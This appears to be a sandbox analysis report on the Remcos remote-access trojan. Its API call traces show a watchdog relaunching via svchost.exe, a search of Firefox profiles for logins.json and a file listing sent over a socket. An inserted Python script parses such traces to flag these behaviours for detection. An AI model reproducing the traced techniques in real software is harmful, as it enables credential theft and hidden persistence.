                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                  • _wgetenv.MSVCRT ref: 0040A758
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                  • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                  • CloseHandle.KERNEL32 ref: 0040A8AA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                  • API String ID: 2208868093-2207663338
                                  • Opcode ID: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                  • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                  • Opcode Fuzzy Hash: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                  • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
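
The two call listings above (the directory walk at 004048xx..00404BFE that feeds a `send` in subcall 00402440, and the watchdog routine at 0040A5FE..0040A8BF that opens a PID with 0x001F0FFF, i.e. PROCESS_ALL_ACCESS, builds a `%WinDir%\system32` or `\SysWOW64` path ending in `\svchost.exe`, and polls with `Sleep(0x7D0)` = 2000 ms) are hard to read because every `std::basic_string` member shows up as an MSVC 6 decorated name. The script below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses trace lines of the shape shown on this page, demangles the recurring `basic_string` symbols (a partial mapping I wrote for this layout, 'D' = char, 'G' = wchar_t), drops string-manipulation noise that carries no literal argument, and flags the two behaviours by their API combinations. The line grammar and the behaviour labels are my own assumptions inferred from the listing; the sample lines are copied from the report above and marked as constructed input.

```python
"""Turn Joe Sandbox-style API trace lines into a readable call summary and flag
two Remcos behaviours: a directory listing that reaches a socket, and the
watchdog's svchost.exe relaunch.  Line grammar and labels are assumptions."""
import re

# One trace line: optional "Part of subcall function XXXXXXXX:" prefix, then
# NAME.MODULE(args) , ref: ADDR  (the argument list is optional).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-F]{8}$")

# Partial demangling for the MSVCP60 std::basic_string symbols seen here.
MEMBER_RE = re.compile(r"^\?(\w+)@\?\$basic_string@([DG])")          # ?c_str@?$basic_string@D...
OP_RE = re.compile(r"^\?\?([0-9A-Z])\?\$basic_string@([DG])")         # ??0 / ??1 / ??4 / ??Y members
FREE_RE = re.compile(r"^\?\?([H9])std@@YA.*?basic_string@([DG])")     # ??Hstd@@YA / ??9std@@YA free ops
OPS = {"0": "ctor", "1": "dtor", "4": "operator=", "Y": "operator+=",
       "H": "operator+", "9": "operator!="}

def demangle(name: str) -> str:
    """Readable name for basic_string symbols; anything else is returned as-is."""
    m = MEMBER_RE.match(name)
    if m:
        return f"std::{'wstring' if m.group(2) == 'G' else 'string'}::{m.group(1)}"
    m = OP_RE.match(name) or FREE_RE.match(name)
    if m:
        kind = "wstring" if m.group(2) == "G" else "string"
        return f"std::{kind}::{OPS.get(m.group(1), 'op' + m.group(1))}"
    return name

def parse_trace(text: str):
    """Parse every trace line into a dict; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a != ""]
        calls.append({"api": demangle(m.group("name")), "module": m.group("module"),
                      "args": args, "ref": m.group("ref"), "subcall": m.group("sub")})
    return calls

def literal_args(call):
    """Arguments that are neither '?' nor an 8-digit hex value, i.e. real literals."""
    return [a for a in call["args"] if a != "?" and not HEX_RE.match(a)]

def summarise(calls):
    """One line per call, dropping std::string calls that carry no literal."""
    out = []
    for c in calls:
        lits = literal_args(c)
        if c["api"].startswith("std::") and not lits:
            continue
        where = c["ref"] + (f" (via {c['subcall']})" if c["subcall"] else "")
        out.append(f"{where}: {c['api']}" + (" " + "; ".join(lits) if lits else ""))
    return out

PROCESS_ALL_ACCESS = 0x001F0FFF   # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF

def flag_behaviours(calls):
    """Behaviour labels (my own names) whose API combination is present."""
    apis = {c["api"] for c in calls}
    mods = {(c["api"], c["module"]) for c in calls}
    strings = {a for c in calls for a in literal_args(c)}
    flags = []
    # Directory walk whose results reach a socket: the file-listing handler.
    if {"FindFirstFileW", "FindNextFileW"} <= apis and ("send", "WS2_32") in mods:
        flags.append("dir-listing-to-socket")
    # Watchdog: all-access handle to a PID, %WinDir% path, svchost.exe, Sleep poll.
    full_access = any(c["api"] == "OpenProcess" and c["args"][:1] == [f"{PROCESS_ALL_ACCESS:08X}"]
                      for c in calls)
    if full_access and "_wgetenv" in apis and "\\svchost.exe" in strings and "Sleep" in apis:
        flags.append("watchdog-svchost-relaunch")
    return flags

# Constructed input: a subset of the lines from the two listings in this report.
DIRLIST_SAMPLE = r"""
• FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
• FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
• wcscmp.MSVCRT ref: 00404924
  • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
• ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00404B81
• atoi.MSVCRT ref: 00404B88
• FindClose.KERNEL32(?), ref: 00404BF6
• ExitThread.KERNEL32 ref: 00404BFE
"""
WATCHDOG_SAMPLE = r"""
• GetCurrentProcessId.KERNEL32 ref: 0040A5FE
• OpenMutexA.KERNEL32 ref: 0040A63B
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
• ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
• _wgetenv.MSVCRT ref: 0040A7B3
• ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
• Sleep.KERNEL32(000007D0), ref: 0040A85E
• CloseHandle.KERNEL32 ref: 0040A8AA
"""

if __name__ == "__main__":
    for name, sample in (("dirlist", DIRLIST_SAMPLE), ("watchdog", WATCHDOG_SAMPLE)):
        calls = parse_trace(sample)
        print(f"== {name}: {flag_behaviours(calls)}")
        print("\n".join(summarise(calls)))
```

The demangling table only covers the `basic_string` members that appear in this report; `atoi` after `c_str` and `send` in the subcall are left as the raw imports, which is what an analyst wants to see when deciding that the directory walk is a command handler rather than local housekeeping.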

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 004105AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                  • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                  • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                  • String ID:
                                  • API String ID: 2968164691-0
                                  • Opcode ID: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                  • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                  • Opcode Fuzzy Hash: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                  • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                  • getenv.MSVCRT ref: 004072D9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
